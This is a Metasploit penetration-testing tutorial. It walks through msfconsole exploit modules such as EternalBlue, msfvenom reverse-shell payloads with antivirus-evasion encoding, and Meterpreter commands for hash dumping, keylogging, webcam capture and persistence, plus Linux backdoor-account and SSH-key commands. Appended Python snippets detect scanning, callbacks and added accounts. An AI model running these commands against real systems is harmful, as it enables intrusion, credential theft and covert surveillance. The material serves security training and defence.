# METASPLOIT - Complete Exploitation Framework Guide
Penetration Testing Framework: discover, exploit, and post-exploit vulnerabilities.

## Table of Contents

- What is Metasploit?
- Installation
- Core Concepts
- Basic Workflow
- Common Exploits
- Payload Generation (msfvenom)
- Meterpreter Commands
- Post-Exploitation
- Real-World Workflow
- Interview Questions

## What is Metasploit?

Metasploit is one of the most powerful and widely used penetration testing frameworks. It allows you to:

- Scan networks for vulnerabilities
- Exploit vulnerabilities automatically
- Generate custom payloads
- Establish reverse shells
- Escalate privileges
- Extract credentials
- Maintain persistence
- Perform post-exploitation activities

Versions:

- Metasploit Framework (free, open source)
- Metasploit Pro (paid, more features)

## Installation

### Kali Linux (pre-installed)

```bash
# Start the database and Metasploit services
sudo systemctl start postgresql
sudo systemctl start metasploit

# Or manually
sudo service postgresql start
sudo msfconsole

# On current Kali releases the database is initialised once with:
sudo msfdb init
```

### Ubuntu/Debian

```bash
# Install dependencies
sudo apt-get install postgresql libpq-dev

# Install Metasploit (omnibus installer script)
curl https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/base/install.sh | bash

# Or from GitHub
git clone https://github.com/rapid7/metasploit-framework.git
cd metasploit-framework
bundle install
./msfconsole
```

### macOS

```bash
brew install metasploit-framework
```

### Start Metasploit

```bash
# Start with database
sudo msfconsole

# Quiet start (no banner)
msfconsole -q

# Start without database
msfconsole -n
```

## Core Concepts

### Modules

- Exploit: attack code targeting a specific vulnerability
- Payload: code executed after successful exploitation
- Encoder: obfuscates the payload to evade detection
- Evasion: techniques to bypass security controls
- Auxiliary: scanning, enumeration, fuzzing
- Post: post-exploitation modules

### Payloads

Types:

- Staged: a small initial stager downloads stage 2 (the full payload)
- Non-staged (stageless): everything in one payload (larger)

In payload names, a `/` between the payload and its transport (`meterpreter/reverse_tcp`) marks a staged payload; an `_` (`meterpreter_reverse_tcp`) marks the stageless form.

Common payloads:

- windows/meterpreter/reverse_tcp (Windows shell)
- linux/x86/meterpreter/reverse_tcp (Linux shell)
- php/meterpreter/reverse_tcp (PHP shell)
- android/meterpreter/reverse_http (Android shell)
- cmd/unix/reverse_sh (Linux shell)

### LHOST & LPORT

- LHOST: your attacker machine IP
- LPORT: port where the reverse shell connects back to you

Example:

- LHOST: 192.168.1.50 (your IP)
- LPORT: 4444 (your listening port)
- Victim connects back to 192.168.1.50:4444

## Basic Workflow

### Step 1: Start Metasploit

```bash
sudo msfconsole
```

### Step 2: Search for an Exploit

```
msf> search type:exploit platform:windows eternalblue
msf> search type:exploit apache

# Results list the module name, disclosure date, rank and description, e.g.:
# Name: exploit/windows/smb/ms17_010_eternalblue
# Rank: Great
```

### Step 3: Select the Exploit

```
msf> use exploit/windows/smb/ms17_010_eternalblue
```

### Step 4: Show Options

```
msf exploit(ms17_010_eternalblue)> show options

# Output (abridged):
# Name     Current Setting                  Required  Description
# RHOSTS                                    yes       Target host(s)
# PAYLOAD  windows/meterpreter/reverse_tcp
# LHOST    192.168.1.50                     yes       Attacker IP
# LPORT    4444                             yes       Listener port
```

### Step 5: Set Options

```
msf> set RHOSTS 192.168.1.100
msf> set LHOST 192.168.1.50
msf> set LPORT 4444
msf> set PAYLOAD windows/meterpreter/reverse_tcp
```

### Step 6: Show Advanced Options

```
msf> show advanced
# Shows timeout, threading and encoding options
```

### Step 7: Exploit!

```
msf> exploit

# Or run as a background job:
msf> exploit -j

# List jobs:
msf> jobs -l

# Interact with a session:
msf> sessions -i 1
```

## Common Exploits

### EternalBlue (Windows SMB RCE)

```
# Most famous exploit
# Affects Windows 7, 8, 8.1, 10, Server 2008, 2012, 2016
msf> use exploit/windows/smb/ms17_010_eternalblue
msf> set RHOSTS 192.168.1.100
msf> set LHOST 192.168.1.50
msf> exploit
# Creates a reverse Meterpreter shell with full access to the Windows target
```

### Apache Struts CVE-2017-5645

```
# Web server vulnerability: remote code execution
msf> use exploit/multi/http/struts2_rce_cve_2017_5645
msf> set RHOSTS 192.168.1.100
msf> set LHOST 192.168.1.50
msf> exploit
```

### vsftpd Backdoor

```
# FTP server vulnerability (vsftpd 2.3.4 backdoor)
msf> use exploit/unix/ftp/vsftpd_234_backdoor
msf> set RHOSTS 192.168.1.100
msf> exploit
# Shell access to the Linux target
```

### Tomcat Manager Upload

```
# Tomcat Manager with weak credentials
msf> use exploit/multi/http/tomcat_mgr_upload
msf> set RHOSTS 192.168.1.100
msf> set HttpUsername admin
msf> set HttpPassword admin
msf> exploit
```

## Payload Generation (msfvenom)

### Basic Syntax

```bash
msfvenom -p [PAYLOAD] LHOST=[IP] LPORT=[PORT] -f [FORMAT] -o [OUTPUT]
```

### Windows Payloads

```bash
# Reverse shell (TCP)
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.50 LPORT=4444 -f exe -o shell.exe

# Bind shell (listens on the target)
msfvenom -p windows/meterpreter/bind_tcp LPORT=4444 -f exe -o shell.exe

# Staged payload (smaller initial size; the "/" in meterpreter/reverse_tcp marks it as staged)
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.50 LPORT=4444 -f exe -o shell.exe

# With encoding (evade antivirus): 10 iterations of shikata_ga_nai
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.50 LPORT=4444 -e x86/shikata_ga_nai -i 10 -f exe -o shell.exe

# As batch file
msfvenom -p windows/shell_reverse_tcp LHOST=192.168.1.50 LPORT=4444 -f batch -o shell.bat
```

### Linux Payloads

```bash
# ELF executable
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.1.50 LPORT=4444 -f elf -o shell

# Shell script
msfvenom -p cmd/unix/reverse_bash LHOST=192.168.1.50 LPORT=4444 -f sh -o shell.sh

# Python payload (raw format emits the Python source itself)
msfvenom -p python/meterpreter/reverse_tcp LHOST=192.168.1.50 LPORT=4444 -f raw -o shell.py
```

### PHP Payloads

```bash
# PHP reverse shell
msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.1.50 LPORT=4444 -f php -o shell.php

# Embed in an existing PHP file
msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.1.50 LPORT=4444 -f php -o shell.txt
```

### Android Payloads

```bash
# APK reverse shell
msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.1.50 LPORT=4444 -o shell.apk
```

## Meterpreter Commands

### Navigation & System Info

```
pwd                      # Current directory
cd /path/to/dir          # Change directory
ls -la                   # List files
cat /etc/passwd          # Read file contents
getuid                   # Current user (whoami in a system shell)
sysinfo                  # System information and hostname (uname -a / hostname in a system shell)
ipconfig (or ifconfig)   # IP configuration
```

### File Operations

```
upload /path/local/file /path/remote/location   # Upload file
download /path/remote/file /path/local/loc      # Download file
rm /path/file                                   # Delete file
mkdir /path/newdir                              # Create directory
```

### Process Management

```
ps              # List processes
kill [PID]      # Kill process
getpid          # Current process ID
migrate [PID]   # Move into another process (stealth)
```

### Credential Dumping

```
hashdump        # Dump SAM hashes (Windows)
lsa_dump_sam    # Dump the SAM through LSA (kiwi extension: run "load kiwi" first)
getsystem       # Escalate to SYSTEM
```

### Keylogging

```
keyscan_start   # Start keystroke logging
keyscan_dump    # Show captured keystrokes
keyscan_stop    # Stop logging
```

### Screenshot & Screen Capture

```
screenshot              # Take screenshot
record_mic [SECONDS]    # Record audio
webcam_snap             # Capture webcam photo
webcam_stream           # Stream webcam
```

### Reverse Shell & Tunneling

```
shell                                                 # Drop to a system shell
execute -f cmd -i -c                                  # Execute a command interactively
portfwd add -l [PORT] -p [REMOTE_PORT] -r [TARGET]    # Port forwarding
```

### Persistence

```
run persistence -X                    # Run at system startup (legacy persistence script)
run persistence -U                    # Run when the user logs on
run scheduler -e                      # Schedule execution
reg setval -k path -v name -d data    # Set a registry value (Windows)
```

## Post-Exploitation

### Windows Post-Exploitation

```
# Escalate to SYSTEM
getsystem

# Dump Windows hashes
hashdump

# Install startup persistence (legacy script)
run persistence -X

# Enumerate the host and extract saved passwords
run windows_enum_ad
run winenum

# Start keylogger
keyscan_start
keyscan_dump
```

### Linux Post-Exploitation

```bash
# Check sudo rights
sudo -l

# Find SUID binaries
find / -perm -4000 2>/dev/null

# Check cron jobs
cat /etc/crontab
find /var/spool/cron -type f

# Create backdoor account
useradd -m backdoor
echo 'backdoor:password' | chpasswd

# SSH key persistence
echo 'PUBLIC_KEY' >> ~/.ssh/authorized_keys
```

### Information Gathering Post-Exploitation

```bash
# Network configuration
ifconfig / ipconfig

# Routing table
route

# Active connections
netstat -an

# ARP table
arp -a

# Open ports
ss -tulpn

# Running services
ps aux
```

## Real-World Workflow

### Complete Exploitation Scenario

```
# 1. SCANNING
msf> use auxiliary/scanner/smb/smb_version
msf> set RHOSTS 192.168.1.0/24
msf> run
# Find vulnerable Windows 7 hosts

# 2. SELECT EXPLOIT
msf> use exploit/windows/smb/ms17_010_eternalblue

# 3. SET OPTIONS
msf> set RHOSTS 192.168.1.100
msf> set LHOST 192.168.1.50
msf> set PAYLOAD windows/meterpreter/reverse_tcp

# 4. EXPLOIT
msf> exploit

# 5. POST-EXPLOITATION
meterpreter> hashdump
meterpreter> getsystem
meterpreter> keyscan_start
meterpreter> run persistence -X
meterpreter> record_mic 10
```

## Interview Questions & Answers

Q1: What's the difference between staged and non-staged payloads?

A: ...
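The scan, exploit and callback steps of the Real-World Workflow leave a network-level pattern a defender can look for: one source touching many hosts on 445, then a victim opening a brand-new outbound connection back to that same source (the reverse_tcp callback to LHOST:LPORT). The following detection is an added example, not part of the original guide; the flow-record format, the sample records and the thresholds are all constructed assumptions.

```python
from collections import defaultdict

# Constructed flow records, not from the page: "epoch src_ip src_port dst_ip dst_port"
FLOW_LINES = [
    "1700000000 192.168.1.50 51001 192.168.1.100 445",   # one source probes
    "1700000001 192.168.1.50 51002 192.168.1.101 445",   # several hosts on 445
    "1700000002 192.168.1.50 51003 192.168.1.102 445",   # (smb_version over the /24)
    "1700000020 192.168.1.50 51010 192.168.1.100 445",   # exploit delivered over SMB
    "1700000023 192.168.1.100 49700 192.168.1.50 4444",  # victim calls back to LHOST:LPORT
    "1700000030 192.168.1.120 49800 192.168.1.10 443",   # benign: workstation to web server
]

SMB_PORT = 445
SCAN_THRESHOLD, SCAN_WINDOW = 3, 60   # distinct 445 targets per source within N seconds (assumed)
CALLBACK_WINDOW = 120                 # max seconds between inbound SMB and the callback (assumed)

def parse_flow(line):
    ts, src, sport, dst, dport = line.split()
    return int(ts), src, int(sport), dst, int(dport)

def find_smb_scanners(flows):
    """Sources that reached SCAN_THRESHOLD or more distinct hosts on 445 within SCAN_WINDOW."""
    by_src = defaultdict(list)
    for ts, src, _, dst, dport in flows:
        if dport == SMB_PORT:
            by_src[src].append((ts, dst))
    scanners = set()
    for src, events in by_src.items():
        events.sort()
        for i, (t0, _) in enumerate(events):
            if len({d for t, d in events[i:] if t - t0 <= SCAN_WINDOW}) >= SCAN_THRESHOLD:
                scanners.add(src)
                break
    return scanners

def find_callbacks(flows):
    """Victims that received SMB from A and then opened a new non-SMB connection back to A."""
    findings = set()
    for ts, attacker, _, victim, dport in flows:
        if dport != SMB_PORT:
            continue
        for ts2, src, _, dst, dport2 in flows:
            if (src, dst) == (victim, attacker) and dport2 != SMB_PORT \
                    and 0 < ts2 - ts <= CALLBACK_WINDOW:
                findings.add((victim, attacker, dport2))
    return sorted(findings)

def analyse(lines):
    flows = [parse_flow(line) for line in lines]
    return {"scanners": find_smb_scanners(flows), "callbacks": find_callbacks(flows)}
```

Port 4444 is only Metasploit's default LPORT; the correlation keys on the reversed source/destination pair and the timing, so a callback on any port is caught.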
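The Linux post-exploitation section adds a login-capable account and appends a key to `authorized_keys`; the defender's counterpart is a baseline comparison of exactly those files. This audit is an added example, not part of the original guide; the `/etc/passwd` and `authorized_keys` snapshots are constructed so it runs offline.

```python
# Constructed /etc/passwd and authorized_keys snapshots (not from the page); the
# "current" copies contain the account and key the post-exploitation steps would add.
BASELINE_PASSWD = """root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
alice:x:1000:1000:Alice:/home/alice:/bin/bash
"""
CURRENT_PASSWD = BASELINE_PASSWD + "backdoor:x:1001:1001::/home/backdoor:/bin/bash\n"

BASELINE_KEYS = "ssh-ed25519 AAAAC3EXAMPLEKEYALICE alice@laptop\n"
CURRENT_KEYS = BASELINE_KEYS + "ssh-rsa AAAAB3EXAMPLEKEYUNKNOWN PUBLIC_KEY\n"

NOLOGIN_SHELLS = {"/usr/sbin/nologin", "/sbin/nologin", "/bin/false"}

def parse_passwd(text):
    """Map account name -> (uid, shell); skips blank and comment lines."""
    accounts = {}
    for line in text.splitlines():
        if line.strip() and not line.startswith("#"):
            name, _, uid, _, _, _, shell = line.split(":", 6)
            accounts[name] = (int(uid), shell)
    return accounts

def new_login_accounts(baseline, current):
    """Accounts absent from the baseline that can log in (the 'useradd -m backdoor' case)."""
    base = parse_passwd(baseline)
    return sorted(name for name, (_, shell) in parse_passwd(current).items()
                  if name not in base and shell not in NOLOGIN_SHELLS)

def extra_uid0_accounts(current):
    """Any account besides root that has UID 0."""
    return sorted(name for name, (uid, _) in parse_passwd(current).items()
                  if uid == 0 and name != "root")

def new_authorized_keys(baseline, current):
    """Key lines present now but not in the baseline (the 'echo PUBLIC_KEY >> authorized_keys' case)."""
    base = {line.strip() for line in baseline.splitlines() if line.strip()}
    return sorted(line.strip() for line in current.splitlines()
                  if line.strip() and line.strip() not in base)

def audit(baseline_passwd, current_passwd, baseline_keys, current_keys):
    return {
        "new_login_accounts": new_login_accounts(baseline_passwd, current_passwd),
        "extra_uid0_accounts": extra_uid0_accounts(current_passwd),
        "new_authorized_keys": new_authorized_keys(baseline_keys, current_keys),
    }
```

In production the baseline would come from a trusted snapshot or configuration-management source, and the same comparison applies to `/etc/crontab` and the per-user cron spool the section also lists.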